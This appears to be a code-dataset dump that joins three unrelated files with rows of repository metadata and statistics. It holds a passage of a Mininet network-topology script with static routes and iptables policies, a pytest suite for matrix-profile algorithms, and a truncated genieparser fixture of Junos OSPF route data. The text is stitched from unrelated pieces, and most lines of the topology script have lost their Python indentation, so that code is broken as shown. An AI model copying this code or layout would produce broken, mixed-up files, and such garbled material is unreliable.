self.sroutes['r2'].append('ip route add 12.0.0.0/8 via 192.168.4.1 dev r2-eth1')
# Connect LAN 1 and LAN 2
r1IP3 = '192.168.5.1'
r3IP1 = '192.168.5.2'
r3IP2 = '192.168.2.1'
r3IP3 = '192.168.3.1'
self.router3 = self.addNode('r3', cls=LinuxRouter, ip=r3IP1)
self.alias['r3'] = []
self.alias['r1'].append(r1IP3)
self.alias['r3'].append(r3IP1)
self.alias['r3'].append(r3IP2)
self.alias['r3'].append(r3IP3)
self.sroutes['r3'] = []
self.swc[6] = self.addSwitch('s6')
# Il primo collegamento switch-router DEVE usare l'indirizzo usato nella definizione del router
self.addLink(self.swc[6], self.router3, intfName2='r3-eth1', params2={'ip': r3IP1+'/24'})
self.addLink(self.swc[6], self.router1, intfName2='r1-eth3', params2={'ip': r1IP3+'/24'})
self.swc[3] = self.addSwitch('s3')
self.addLink(self.swc[3], self.router3, intfName2='r3-eth2', params2={'ip': r3IP2+'/24'})
self.net_hosts.append(self.addHost('h5', ip='192.168.2.2/24', defaultRoute=r3IP2+'/24'))
self.addLink('h5', self.swc[3])
self.alias['h5'] = ['192.168.2.2']
self.net_hosts.append(self.addHost('h6', ip='192.168.2.3/24', defaultRoute=r3IP2+'/24'))
self.addLink('h6', self.swc[3])
self.alias['h6'] = ['192.168.2.3']
self.sroutes['h5'] = ['ip route add default via 192.168.2.1 dev h5-eth0']
self.sroutes['h6'] = ['ip route add default via 192.168.2.1 dev h6-eth0']
self.sroutes['r1'].append('ip route add 192.168.2.0/24 via 192.168.5.2 dev r1-eth3')
self.sroutes['r1'].append('ip route add 192.168.3.0/24 via 192.168.5.2 dev r1-eth3')
self.sroutes['r3'].append('ip route add 192.168.1.0/24 via 192.168.5.1 dev r3-eth1')
self.sroutes['r3'].append('ip route add 192.168.4.0/24 via 192.168.5.1 dev r3-eth1')
self.sroutes['r3'].append('ip route add 12.0.0.0/8 via 192.168.5.1 dev r3-eth1')
self.sroutes['r3'].append('ip route add 12.10.5.2/8 via 192.168.5.1 dev r3-eth1')
self.swc[4] = self.addSwitch('s4')
self.addLink(self.swc[4], self.router3, intfName2='r3-eth3', params2={'ip': r3IP3+'/24'})
self.net_hosts.append(self.addHost('h7', ip='192.168.3.2/24', defaultRoute=r3IP3+'/24'))
self.addLink('h7', self.swc[4])
self.alias['h7'] = ['192.168.3.2']
self.net_hosts.append(self.addHost('h8', ip='192.168.3.3/24', defaultRoute=r3IP3+'/24'))
self.addLink('h8', self.swc[4])
self.alias['h8'] = ['192.168.3.3']
self.sroutes['h7'] = ['ip route add default via 192.168.3.1 dev h7-eth0']
self.sroutes['h8'] = ['ip route add default via 192.168.3.1 dev h8-eth0']
if self.sensor1: self.add_sensor_Internet()
if self.sensor2: self.add_sensor_LAN(1)
if self.sensor3: self.add_sensor_LAN(2)
if self.sensor4: self.add_sensor_LAN(3)
def add_sensor_LAN(self, i):
asid = 'has' + str(i)
msid = 'hms' + str(i)
rIP = '192.168.' + str(i) + '.1'
asIP = '192.168.' + str(i) + '.101' # Active sensor IP
msIP = '192.168.' + str(i) + '.103' # Monitor sensor IP (the one that runs iTop)
self.active_sensors.append(self.addHost(asid, ip=asIP + '/24', defaultRoute=rIP))
if i == 1:
sensor=self.swc[2]
intf = 's2-eth1'
elif i == 2 :
sensor=self.swc[3]
intf = 's3-eth1'
else:
sensor=self.swc[4]
intf = 's4-eth1'
self.passive_sensors.append(sensor)
self.interface_name.append(intf)
self.monitor_sensors.append(self.addHost(msid, ip=msIP + '/24', defaultRoute=rIP))
self.addLink(asid, self.swc[i + 1])
self.addLink(msid, self.swc[i + 1])
# The three IP address of the sensor are referred to the monitor sensor, because it is the only one that can actively ask
self.alias[msid] = [asIP]
self.alias[msid].append(msIP)
if i == 1:
self.sroutes['r2'].append('ip route add ' + msIP + '/32 via ' + msIP + ' dev r2-eth2')
else:
self.sroutes['r3'].append('ip route add ' + msIP + '/32 via ' + msIP + ' dev r3-eth' + str(i))
self.sroutes[asid] = ['ip route add default via ' + rIP + ' dev ' + asid + '-eth0']
self.sroutes[msid] = ['ip route add default via ' + rIP + ' dev ' + msid + '-eth0']
def add_sensor_Internet(self):
asid = 'hasI'
msid = 'hmsI'
rIP = '12.10.5.1'
asIP = '12.10.5.101' # Active sensor IP
msIP = '12.10.5.103' # Monitor sensor IP (the one that runs iTop)
self.active_sensors.append(self.addHost(asid, ip=asIP + '/8', defaultRoute=rIP))
self.passive_sensors.append(self.swc[1])
self.interface_name.append('s1-eth1')
self.monitor_sensors.append(self.addHost(msid, ip=msIP + '/8', defaultRoute=rIP))
self.addLink(asid, self.swc[1])
self.addLink(msid, self.swc[1])
# The three IP address of the sensor are referred to the monitor sensor, because it is the only one that can actively ask
self.alias[msid] = [asIP]
self.alias[msid].append(msIP)
self.sroutes['r1'].append('ip route add ' + msIP + '/32 via ' + msIP + ' dev r1-eth1')
self.sroutes[asid] = ['ip route add default via ' + rIP + ' dev ' + asid + '-eth0']
self.sroutes[msid] = ['ip route add default via ' + rIP + ' dev ' + msid + '-eth0']
def add_static_routes(self, net):
    """Add static routes to the router for subnets not directly visible.

    For every node name queued in ``self.sroutes``, run each stored
    ``ip route add …`` command on the corresponding node of *net*.
    """
    for node, commands in self.sroutes.items():
        for command in commands:
            net[node].cmd(command)
def create_alias_file(self):
    """Write the alias map to a file named ``alias`` in the working directory.

    One line per key: the key, then each of its IP aliases, every field
    followed by a single space, terminated by a newline
    (``"<host> <ip1> <ip2> \\n"``).
    """
    lines = []
    for host, addresses in self.alias.items():
        fields = [host] + list(addresses)
        lines.append(' '.join(fields) + ' \n')
    with open('alias', 'w') as out:
        out.writelines(lines)
def add_firewall_rules(self, net):
'''Add firewall rules to make router r1 anonymous'''
net['r1'].cmd('iptables -P FORWARD DROP')
net['r1'].cmd('iptables -P INPUT DROP')
net['r1'].cmd('iptables -P OUTPUT DROP') | 52.839421 | 173 | 0.583644 | 11,777 | 76,670 | 3.767938 | 0.027172 | 0.042321 | 0.039211 | 0.033713 | 0.975617 | 0.971741 | 0.96969 | 0.961442 | 0.959256 | 0.95511 | 0 | 0.09938 | 0.25152 | 76,670 | 1,451 | 174 | 52.839421 | 0.673893 | 0.188327 | 0 | 0.945374 | 0 | 0.051101 | 0.203532 | 0.000684 | 0 | 0 | 0 | 0.002757 | 0 | 1 | 0.05022 | false | 0.021145 | 0.005286 | 0 | 0.064317 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8173b98ebf88a00b38505a3ff2e9bd36cb563a8b | 7,153 | py | Python | tests/test_matrixProfile.py | heyoka/matrixprofile-ts | 2cea36ff3ba1a74e81ba9ab6e6735a095fa7498d | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | tests/test_matrixProfile.py | heyoka/matrixprofile-ts | 2cea36ff3ba1a74e81ba9ab6e6735a095fa7498d | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | tests/test_matrixProfile.py | heyoka/matrixprofile-ts | 2cea36ff3ba1a74e81ba9ab6e6735a095fa7498d | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2019-06-24T02:57:02.000Z | 2019-06-24T02:57:02.000Z | from matrixprofile.matrixProfile import *
import numpy as np
import pytest
class TestClass(object):
    """Unit tests for the matrix-profile algorithms.

    Every algorithm (naiveMP, stmp, stamp, stomp, stampi_update) is exercised
    on the same repeating 0/1 series, for which the matrix profile (r[0]) is
    known to be all zeros and the profile index (r[1]) is known, both for a
    self-join and for a join against a second, identical series.  The stamp
    tests also cover sampling validation and random_state reproducibility.
    """

    # -- naiveMP ----------------------------------------------------------

    def test_naiveMP_self_mp(self):
        a = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0])
        mp_outcome = np.array([0., 0., 0., 0., 0., 0., 0., 0., 0.])
        r = naiveMP(a,4)
        assert(r[0] == mp_outcome).all()

    def test_naiveMP_self_mpi(self):
        a = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0])
        mpi_outcome = np.array([4., 5., 6., 7., 0., 1., 2., 3., 0.])
        r = naiveMP(a,4)
        assert(r[1] == mpi_outcome).all()

    def test_naiveMP_dual_mp(self):
        a = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0])
        b = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0])
        mp_outcome = np.array([0., 0., 0., 0., 0., 0., 0., 0., 0.])
        r = naiveMP(a,4,b)
        assert(r[0] == mp_outcome).all()

    def test_naiveMP_dual_mpi(self):
        a = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0])
        b = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0])
        mpi_outcome = np.array([0., 1., 2., 3., 0., 1., 2., 3., 0.])
        r = naiveMP(a,4,b)
        assert(r[1] == mpi_outcome).all()

    # -- stmp -------------------------------------------------------------

    def test_stmp_self_mp(self):
        a = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0])
        mp_outcome = np.array([0., 0., 0., 0., 0., 0., 0., 0., 0.])
        r = stmp(a,4)
        assert(r[0] == mp_outcome).all()

    def test_stmp_self_mpi(self):
        a = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0])
        mpi_outcome = np.array([4., 5., 6., 7., 0., 1., 2., 3., 0.])
        r = stmp(a,4)
        assert(r[1] == mpi_outcome).all()

    def test_stmp_dual_mp(self):
        a = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0])
        b = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0])
        mp_outcome = np.array([0., 0., 0., 0., 0., 0., 0., 0., 0.])
        r = stmp(a,4,b)
        assert(r[0] == mp_outcome).all()

    def test_stmp_dual_mpi(self):
        a = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0])
        b = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0])
        mpi_outcome = np.array([0., 1., 2., 3., 0., 1., 2., 3., 0.])
        r = stmp(a,4,b)
        assert(r[1] == mpi_outcome).all()

    # -- stamp ------------------------------------------------------------

    def test_stamp_self_mp(self):
        a = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0])
        mp_outcome = np.array([0., 0., 0., 0., 0., 0., 0., 0., 0.])
        r = stamp(a,4, sampling=1.0)
        assert(r[0] == mp_outcome).all()

    def test_stamp_self_mpi(self):
        # Note that we're only testing for the length of the matrix profile
        # index and not the specific values (stamp samples randomly).
        a = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0])
        r = stamp(a,4,sampling=1.0)
        assert(len(r[1]) == 9)

    def test_stamp_dual_mp(self):
        a = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0])
        b = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0])
        mp_outcome = np.array([0., 0., 0., 0., 0., 0., 0., 0., 0.])
        r = stamp(a,4,b,sampling=1.0)
        assert(r[0] == mp_outcome).all()

    def test_stamp_dual_mpi(self):
        # Only the length of the profile index is checked here as well.
        a = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0])
        b = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0])
        r = stamp(a,4,b,sampling=1.0)
        assert(len(r[1]) == 9)

    # -- stampi (incremental update) --------------------------------------

    def test_stampi_mp(self):
        a = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0])
        r = stamp(a,4, sampling=1.0)
        final = np.round(stampi_update(a,4,r[0],r[1],95),2)
        mp_outcome = np.array([0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.83])
        assert(np.allclose(final[0],mp_outcome))

    def test_stampi_mpi(self):
        a = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0])
        r = stamp(a,4, sampling=1.0)
        final = np.round(stampi_update(a,4,r[0],r[1],95),2)
        mpi_outcome = np.array([4.0, 5.0, 6.0, 7.0, 0.0, 1.0, 2.0, 3.0, 3.0])
        assert(np.allclose(final[1],mpi_outcome))

    # -- stomp ------------------------------------------------------------

    def test_stomp_self_mp(self):
        a = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0])
        mp_outcome = np.array([0., 0., 0., 0., 0., 0., 0., 0., 0.])
        r = stomp(a,4)
        assert(r[0] == mp_outcome).all()

    def test_stomp_self_mpi(self):
        a = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0])
        mpi_outcome = np.array([4., 5., 6., 7., 0., 1., 2., 3., 0.])
        r = stomp(a,4)
        assert(r[1] == mpi_outcome).all()

    # -- stamp parameter validation and reproducibility -------------------

    def test_stamp_sampling_over_one(self):
        with pytest.raises(ValueError) as excinfo:
            stamp(None,None,sampling=2)
        assert 'Sampling value must be a percentage' in str(excinfo.value)

    def test_stamp_sampling_under_zero(self):
        with pytest.raises(ValueError) as excinfo:
            stamp(None,None,sampling=-1)
        assert 'Sampling value must be a percentage' in str(excinfo.value)

    def test_stamp_random_state_same_results_self_join(self):
        random_state = 99
        sampling = 0.30
        a = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0])
        r = stamp(a,4,None,sampling=sampling,random_state=random_state)
        r2 = stamp(a,4,None,sampling=sampling,random_state=random_state)
        all_same = (r[0] == r2[0]).all() and (r[1] == r2[1]).all()
        assert(all_same == True)

    def test_stamp_random_state_same_results_dual_join(self):
        random_state = 99
        sampling = 0.30
        a = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0])
        b = np.array([0.0,1.0,1.0,0.2,0.0,1.0,1.0,0.3,0.0,1.0,1.0,0.0])
        r = stamp(a,4,b,sampling=sampling,random_state=random_state)
        r2 = stamp(a,4,b,sampling=sampling,random_state=random_state)
        all_same = (r[0] == r2[0]).all() and (r[1] == r2[1]).all()
        assert(all_same == True)

    def test_stamp_with_parallel_version_random_state_set_self_join(self):
        # sampling=0.1 triggers the (possibly parallel) sampled code path.
        random_state = 99
        sampling = 0.1
        a = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0])
        r = stamp(a,4,None,sampling=sampling,random_state=random_state)
        r2 = stamp(a,4,None,sampling=sampling,random_state=random_state)
        all_same = (r[0] == r2[0]).all() and (r[1] == r2[1]).all()
        assert(all_same == True)

    def test_stamp_with_parallel_version_random_state_set_dual_join(self):
        random_state = 99
        sampling = 0.1
        a = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,2.0,0.0,1.1,1.0,0.0])
        b = np.array([0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0,0.0,1.0,1.0,0.0])
        r = stamp(a,4,b,sampling=sampling,random_state=random_state)
        r2 = stamp(a,4,b,sampling=sampling,random_state=random_state)
        all_same = (r[0] == r2[0]).all() and (r[1] == r2[1]).all()
        assert(all_same == True)
81b22d29e34fbf54311e9348a9b56b1fdf20d5e0 | 59,091 | py | Python | src/genie/libs/parser/junos/tests/ShowOspfRouteBrief/cli/equal/golden_output_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | 204 | 2018-06-27T00:55:27.000Z | 2022-03-06T21:12:18.000Z | src/genie/libs/parser/junos/tests/ShowOspfRouteBrief/cli/equal/golden_output_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | 468 | 2018-06-19T00:33:18.000Z | 2022-03-31T23:23:35.000Z | src/genie/libs/parser/junos/tests/ShowOspfRouteBrief/cli/equal/golden_output_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | 309 | 2019-01-16T20:21:07.000Z | 2022-03-30T12:56:41.000Z | expected_output = {
"ospf-route-information": {
"ospf-topology-route-table": {
"ospf-route": [
{
"ospf-route-entry": [
{
"address-prefix": "10.36.3.3",
"interface-cost": "1201",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Router",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.100.5.5",
"interface-cost": "1200",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Router",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.19.198.239",
"interface-cost": "1000",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.19.198.26"
},
"next-hop-name": {"interface-name": "ge-0/0/2.0"},
},
"route-path-type": "Intra",
"route-type": "Router",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.34.2.250",
"interface-cost": "200",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "AS BR",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.34.2.251",
"interface-cost": "205",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "AS BR",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.169.196.241",
"interface-cost": "1200",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Router",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.169.14.240",
"interface-cost": "100",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "AS BR",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.169.14.241",
"interface-cost": "105",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "AS BR",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.189.5.253",
"interface-cost": "5",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.189.5.94"
},
"next-hop-name": {"interface-name": "ge-0/0/0.0"},
},
"route-path-type": "Intra",
"route-type": "AS BR",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "192.168.36.119",
"interface-cost": "10100",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "AS BR",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "192.168.36.120",
"interface-cost": "10100",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "AS BR",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "0.0.0.0/0",
"interface-cost": "101",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Ext1",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.1.0.0/24",
"interface-cost": "20",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Ext2",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.36.3.3/32",
"interface-cost": "1202",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.16.0.0/30",
"interface-cost": "1200",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.100.5.5/32",
"interface-cost": "1201",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
},
{
"address-prefix": "10.100.5.5/32",
"interface-cost": "1201",
"next-hop-type": "Spring",
"ospf-backup-next-hop": {
"ospf-backup-next-hop-address": "10.189.5.94",
"ospf-backup-next-hop-interface": "ge-0/0/0.0",
"ospf-backup-next-hop-type": "Bkup SPRING",
},
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
},
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.19.198.24/30",
"interface-cost": "1000",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-name": {"interface-name": "ge-0/0/2.0"}
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.19.198.28/30",
"interface-cost": "1005",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.189.5.94"
},
"next-hop-name": {"interface-name": "ge-0/0/0.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.19.198.239/32",
"interface-cost": "1001",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.19.198.26"
},
"next-hop-name": {"interface-name": "ge-0/0/2.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
},
{
"address-prefix": "10.19.198.239/32",
"interface-cost": "1001",
"next-hop-type": "Spring",
"ospf-backup-next-hop": {
"ospf-backup-next-hop-address": "10.189.5.94",
"ospf-backup-next-hop-interface": "ge-0/0/0.0",
"ospf-backup-next-hop-type": "Bkup SPRING",
},
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.19.198.26"
},
"next-hop-name": {"interface-name": "ge-0/0/2.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
},
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.174.132.237/32",
"interface-cost": "150",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Ext1",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.34.2.200/30",
"interface-cost": "205",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.34.2.250/32",
"interface-cost": "200",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
},
{
"address-prefix": "10.34.2.250/32",
"interface-cost": "200",
"next-hop-type": "Spring",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
},
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.34.2.251/32",
"interface-cost": "205",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
},
{
"address-prefix": "10.34.2.251/32",
"interface-cost": "205",
"next-hop-type": "Spring",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
},
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.15.0.0/30",
"interface-cost": "1001",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.19.198.26"
},
"next-hop-name": {"interface-name": "ge-0/0/2.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.64.0.0/30",
"interface-cost": "1201",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.55.0.0/24",
"interface-cost": "100",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-name": {"interface-name": "ge-0/0/3.0"}
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.169.196.212/30",
"interface-cost": "1200",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.169.196.216/30",
"interface-cost": "1205",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.169.196.241/32",
"interface-cost": "1201",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
},
{
"address-prefix": "10.169.196.241/32",
"interface-cost": "1201",
"next-hop-type": "Spring",
"ospf-backup-next-hop": {
"ospf-backup-next-hop-address": "10.189.5.94",
"ospf-backup-next-hop-interface": "ge-0/0/0.0",
"ospf-backup-next-hop-type": "Bkup SPRING",
},
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
},
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.169.14.16/30",
"interface-cost": "105",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.169.14.32/30",
"interface-cost": "225",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.169.14.120/30",
"interface-cost": "100",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-name": {"interface-name": "ge-0/0/1.0"}
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.169.14.128/30",
"interface-cost": "125",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.189.5.94"
},
"next-hop-name": {"interface-name": "ge-0/0/0.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.169.14.156/30",
"interface-cost": "200",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
}
]
},
{
"ospf-route-entry": [
{
"address-prefix": "10.169.14.240/32",
"interface-cost": "100",
"next-hop-type": "IP",
"ospf-next-hop": {
"next-hop-address": {
"interface-address": "10.169.14.121"
},
"next-hop-name": {"interface-name": "ge-0/0/1.0"},
},
"route-path-type": "Intra",
"route-type": "Network",
},
